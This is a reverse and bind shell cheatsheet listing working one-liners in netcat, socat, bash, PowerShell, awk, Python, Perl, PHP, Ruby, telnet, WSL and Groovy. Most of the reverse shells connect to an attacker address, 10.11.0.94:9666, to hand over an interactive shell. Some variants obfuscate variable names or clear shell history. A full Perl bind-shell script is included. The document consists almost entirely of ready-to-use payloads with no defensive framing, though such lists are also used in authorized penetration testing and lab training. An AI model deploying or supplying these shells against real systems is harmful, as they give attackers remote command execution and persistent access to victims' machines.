Bind and Reverse Shell Cheatsheet

### NETCAT, NC, NCAT, SOCAT

# BIND

# Linux
nc -lvp 9666 -c /bin/bash
nc -v -l -p 9666 -e /bin/bash
ncat -v -l -p 9666 -e /bin/sh
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.0.94:9666

# UDP
socat udp-listen:9666 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

# Windows

# REVERSE

# Linux
# TCP
nc -e /bin/sh 10.11.0.94 9666
sh -c (netcat -e /bin/sh 10.11.0.94 9666)
nc 10.11.0.94 9666 -c /bin/bash
socat tcp-connect:10.11.0.94:9666 exec:"bash -li",pty,stderr,setsid,sigint,sane

# UDP
mkfifo fifo ; nc.traditional -u 10.11.0.94 9666 < fifo | { bash -i; } > fifo

#Windows
nc -e cmd.exe 10.11.0.94 9666
nc.exe -e cmd 10.11.0.94 9999

### Bash

#BIND / REVERSE
exec 4<>/dev/tcp/10.11.0.94/9666 & bash <&4 >&4 2>&4
/bin/bash -c 'nc -e /bin/bash 10.10.16.28 9666'

/bin/bash -i >& /dev/tcp/10.11.0.94/9666 0>&1

### Powershell

# Bind
# TCP
powershell.exe -nop -ep bypass -Command "$POEPuBOnP=9666;$QiCQYM=[System.Net.Sockets.TcpListener]$POEPuBOnP;$QiCQYM.Start();$BCExYicOF=$QiCQYM.AcceptTCPClient();$uOEzWnUgaDVjjv=$BCExYicOF.GetStream();[byte[]]$PuIIgTmzFsyCw=0..65535|%{0};$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n');$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);while(($YfipECz=$uOEzWnUgaDVjjv.Read($PuIIgTmzFsyCw,0,$PuIIgTmzFsyCw.Length)) -ne 0){$uIKBicIvZGuxL=([text.encoding]::ASCII).GetString($PuIIgTmzFsyCw,0,$YfipECz);try{$xliZgEUhKIhR=(Invoke-Expression -command $uIKBicIvZGuxL 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$POEPuBOnP0=$xliZgEUhKIhR+ 'PS '+(Get-Location).Path + '> ';$POEPuBOnP1=($error[0] | Out-String);$error.clear();$POEPuBOnP0=$POEPuBOnP0+$POEPuBOnP1;$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes($POEPuBOnP0);$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);$uOEzWnUgaDVjjv.Flush();};$BCExYicOF.Close();if($QiCQYM){$QiCQYM.Stop();};"

# Reverse
powershell.exe -nop -ep bypass -Command "$WZwFHYUAklT=new-object system.net.sockets.tcpclient('10.11.0.94',9666);$RAgjhqTxqkY=$WZwFHYUAklT.GetStream();[byte[]]$rOvfftiCPHyHH=0..65535|%{0};while(($VziNCnd=$RAgjhqTxqkY.Read($rOvfftiCPHyHH,0,$rOvfftiCPHyHH.Length)) -ne 0){;$JTsudWp=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($rOvfftiCPHyHH,0,$VziNCnd);$XDttpW=(iex $JTsudWp 2>&1|out-string);$lHhMPyKR=$XDttpW+'PS '+(pwd).Path+'>';$HKUgVNdPCJA=([text.encoding]::ASCII).GetBytes($lHhMPyKR);$RAgjhqTxqkY.Write($HKUgVNdPCJA,0,$HKUgVNdPCJA.Length);$RAgjhqTxqkY.Flush};$WZwFHYUAklT.close()"



### AWK
# Bind
# TCP
VFeFQbKCIGEmWWd=9666;awk -v BFliPDXzHtF="$VFeFQbKCIGEmWWd" 'BEGIN{cJIRurZJkzLWN="/inet/tcp/"BFliPDXzHtF"/0/0";for(;cJIRurZJkzLWN|&getline mjEQvNrf;close(mjEQvNrf))while(mjEQvNrf|getline)print|&cJIRurZJkzLWN;close(cJIRurZJkzLWN)}'

# Reverse
# TCP
RvVoCsjjsJMzwK=9666;awk -v oysItzsoEHe="$RvVoCsjjsJMzwK" 'BEGIN{blCZpqVJEORlPrD="/inet/tcp/0/10.11.0.94/"oysItzsoEHe;while(4224075){do{printf "shell>"|&blCZpqVJEORlPrD;blCZpqVJEORlPrD|& getline EwwinCCqNYEM;if(EwwinCCqNYEM){while((EwwinCCqNYEM|& getline)>0)print $0|&blCZpqVJEORlPrD;close(EwwinCCqNYEM);}}while(EwwinCCqNYEM!="exit")close(blCZpqVJEORlPrD);break}}' /dev/null


### Python

#Bind
# TCP
python -c "import socket,subprocess,os;vAWzivjLBkVfc=socket.socket(socket.AF_INET,socket.SOCK_STREAM);vAWzivjLBkVfc.bind(('',9666));vAWzivjLBkVfc.listen(1);conn,addr=vAWzivjLBkVfc.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);doPYBrXyzk=subprocess.call(['/bin/bash','-i'])"
# UDP
python -c 'while 3699958: from subprocess import Popen,PIPE;from socket import socket,AF_INET,SOCK_DGRAM;ctertNWyff=socket(AF_INET,SOCK_DGRAM);ctertNWyff.bind(("0.0.0.0",9666));uZpZoqEhjG,OeEdonFxnjHdQC=ctertNWyff.recvfrom(8096);VAINWEL=Popen(uZpZoqEhjG,shell=True,stdout=PIPE,stderr=PIPE).communicate();ctertNWyff.sendto("".join([VAINWEL[0],VAINWEL[1]]),OeEdonFxnjHdQC)'

#Reverse
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.94",9666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
# TCP
python -c "import os;import pty;import socket;gGCkZIwXybuZ='10.11.0.94';yCbIpRMugNIjpK=9666;QfTnACeu=socket.socket(socket.AF_INET,socket.SOCK_STREAM);QfTnACeu.connect((gGCkZIwXybuZ,yCbIpRMugNIjpK));os.dup2(QfTnACeu.fileno(),0);os.dup2(QfTnACeu.fileno(),1);os.dup2(QfTnACeu.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');QfTnACeu.close();"
# UDP
python -c "import os;import pty;import socket;nZgEXRtSRzqC='10.11.0.94';VNlUlPGxg=9666;gZrLtbKn=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);gZrLtbKn.connect((nZgEXRtSRzqC,VNlUlPGxg));os.dup2(gZrLtbKn.fileno(),0);os.dup2(gZrLtbKn.fileno(),1);os.dup2(gZrLtbKn.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');gZrLtbKn.close();"

#TTY Upgrade
python -c 'import pty;pty.spawn("/bin/bash");'

### Perl

# BIND
# TCP
perl -MSocket -e '$ZYrErhgsAQLkOn=9666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($ZYrErhgsAQLkOn, INADDR_ANY));listen(S,SOMAXCONN);for(;$ZYrErhgsAQLkOn=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'

# UDP
perl -MIO::Socket::INET -e '$|=1;$osZpTISlDfXdpu=new IO::Socket::INET->new();$osZpTISlDfXdpu = new IO::Socket::INET(LocalPort => 9666,Proto => "udp");while(3935169){ $osZpTISlDfXdpu->recv($nnuPTwDEcIcVzx,1024);$UImIweTXXwHLLW=$osZpTISlDfXdpu->peerhost();$McejSrrMbnv=$osZpTISlDfXdpu->peerport();$eNUwuwQRR=qx($nnuPTwDEcIcVzx);$osZpTISlDfXdpu->send($eNUwuwQRR);}'

# REVERSE
# TCP
perl -MSocket -e "\$mldtfJqywzinf='10.11.0.94';\$tFCaIt=9666;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$tFCaIt,inet_aton(\$mldtfJqywzinf)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};"

perl -MIO::Socket::INET -e "\$otVtYALdNKLxAhu=fork;exit,if(\$otVtYALdNKLxAhu);\$gGysZRBGM=new IO::Socket::INET(PeerAddr,'10.11.0.94:'.9666);\$gGysZRBGM->send('shell>');STDIN->fdopen(\$gGysZRBGM,r);$~->fdopen(\$gGysZRBGM,w);system\$_ while<>;"

# UDP
perl -MIO::Socket::INET -e '$|=1;$TIUfoZfWUdApiE = new IO::Socket::INET(PeerAddr => "10.11.0.94:".9666,Proto => "udp");while(3197178){$TIUfoZfWUdApiE->send("shell>");$TIUfoZfWUdApiE->recv($SwjGyTPLZSdP,1024);$LMtFaAsjjeNFW=$TIUfoZfWUdApiE->peerhost();$STiYluqBdRR=$TIUfoZfWUdApiE->peerport();$YAaVWn=qx($SwjGyTPLZSdP);$TIUfoZfWUdApiE->send($YAaVWn);}'


doesnt work windows ? i dunno: perl-MIO-e$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.0.94:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
perl -e 'use Socket;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S, SOMAXCONN);for(; $p= accept(C, S); close C) {open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/sh -i");};'

#!/usr/bin/perl
$SHELL="/bin/bash -i";
$LISTEN_PORT=4444;
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

### PHP

# Bind
# TCP
php -r '$FOMuQWaHtM=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($FOMuQWaHtM,"0.0.0.0",9666);socket_listen($FOMuQWaHtM,1);$fFzXOtE=socket_accept($FOMuQWaHtM);while(9334434){if(!socket_write($fFzXOtE,"$ ",2))exit;$sAVHPeXYXH=socket_read($fFzXOtE,100);$RLiAMNPvRgtL=popen("$sAVHPeXYXH","r");while(!feof($RLiAMNPvRgtL)){$TnwbpufPufnDP=fgetc($RLiAMNPvRgtL);socket_write($fFzXOtE,$TnwbpufPufnDP,strlen($TnwbpufPufnDP));}}'

# UDP
php -r '$QWFKJB=socket_create(AF_INET,SOCK_DGRAM, 0);socket_bind($QWFKJB,"0.0.0.0",9666);while(3962955){socket_recvfrom($QWFKJB,$uENShOlCyH,1024,0,$NGsgNeu,$ZfowrRFLJwSuTZ);$tXjeFraPPdfE=shell_exec($uENShOlCyH);socket_sendto($QWFKJB,$tXjeFraPPdfE,1024,0,$NGsgNeu,$ZfowrRFLJwSuTZ);}'


# Reverse
php -r "\$dfgIhOODFaCqN=fsockopen('10.11.0.94',9666);exec('/bin/sh -i <&3 >&3 2>&3');"

### Ruby

# Bind
# TCP
ruby -rsocket -e 'mBigOrQfqI=TCPServer.new(9666);zfiivTqXCE=mBigOrQfqI.accept;mBigOrQfqI.close();$stdin.reopen(zfiivTqXCE);$stdout.reopen(zfiivTqXCE);$stderr.reopen(zfiivTqXCE);$stdin.each_line{|cwxkhQXR|cwxkhQXR=cwxkhQXR.strip;next if cwxkhQXR.length==0;(IO.popen(cwxkhQXR,"rb"){|nEONHcjSuRgMjQy|nEONHcjSuRgMjQy.each_line{|cViuBA|c.puts(cViuBA.strip)}})rescue nil}'

# UDP
ruby -rsocket -e 'require "open3";zopVJpIS=UDPSocket.new;zopVJpIS.bind("0.0.0.0",9666);loop do zlFwIty,vsLPTd=zopVJpIS.recvfrom(1024);fpTqoolwHhea,bgcURfii,fNUPswRpfss=Open3.capture3(zlFwIty);zopVJpIS.send(fpTqoolwHhea,0,vsLPTd[3],vsLPTd[1]); end'

# Reverse
ruby -rsocket -e "exit if fork;wZfKvvoaDS=TCPSocket.new('10.11.0.94',9666);while(wZfKvvoaDS.print 'shell>';kOdEYNAyAGl=wZfKvvoaDS.gets);IO.popen(kOdEYNAyAGl,'r'){|npailbTCc|wZfKvvoaDS.print npailbTCc.read}end"

### OpenBSD

# BIND
# TCP
rm /tmp/BpIGSjNzY;mkfifo /tmp/BpIGSjNzY;cat /tmp/BpIGSjNzY|/bin/sh -i 2>&1|nc -lvp 9666 >/tmp/BpIGSjNzY

# UDP
coproc nc -luvp 9666; exec /bin/bash <&0${COPROC[0]} >&${COPROC[1]} 2>&1

# Reverse
# TCP
if [ -e /tmp/HREJpO ];then rm /tmp/HREJpO;fi;mkfifo /tmp/HREJpO;cat /tmp/HREJpO|/bin/sh -i 2>&1|nc 10.11.0.94 9666 > /tmp/HREJpO

# UDP
if [ -e /tmp/IoYqOQAM ];then rm -f /tmp/IoYqOQAM;fi;mknod /tmp/IoYqOQAM p && nc 10.11.0.94 9666 0</tmp/IoYqOQAM|/bin/bash 1>/tmp/IoYqOQAM



### Windows Subsystem For Linux
echo system("wsl.exe bash -c 'ls|nc 10.11.0.94 9666'");
c:\distros\ubuntu\ubuntu.exe run /bin/bash -c nc -e /bin/bash 10.11.0.94 9666
c:\windows\sysnative\bash.exe -c "sudo /bin/bash -c 'exec 4<>/dev/tcp/10.11.0.94/9666 & bash <&4 >&4 2>&4'"
d.php:echo system('c:/windows/sysnative/bash.exe -c "nc -c /bin/bash 10.11.0.94 9666"');

### Telnet
sh -c (sleep 3845|telnet 10.11.0.94 9666|while : ; do sh && break; done 2>&1|telnet 10.11.0.94 9666 >/dev/null 2>&1 &)

### Groovy
# Reverse
groovysh -e 'String AJmQZT="10.11.0.94";int ZUKfnXOsqWWHV=9666;String xwwkhjWJZhWa="cmd.exe";Process YkZrixXErq=new ProcessBuilder(xwwkhjWJZhWa).redirectErrorStream(true).start();Socket LghqfD=new Socket(AJmQZT,ZUKfnXOsqWWHV);InputStream DNaQnEkhi=YkZrixXErq.getInputStream(),KmomutfOCfYHxd=YkZrixXErq.getErrorStream(), AJmQZT0=LghqfD.getInputStream();OutputStream EfIWHiSnqN=YkZrixXErq.getOutputStream(),DkfcqADYwX=LghqfD.getOutputStream();while(!LghqfD.isClosed()){while(DNaQnEkhi.available()>0)DkfcqADYwX.write(DNaQnEkhi.read());while(KmomutfOCfYHxd.available()>0)DkfcqADYwX.write(KmomutfOCfYHxd.read());while(AJmQZT0.available()>0)EfIWHiSnqN.write(AJmQZT0.read());DkfcqADYwX.flush();EfIWHiSnqN.flush();Thread.sleep(50);try{YkZrixXErq.exitValue();break;}catch(Exception e){}};YkZrixXErq.destroy();LghqfD.close();'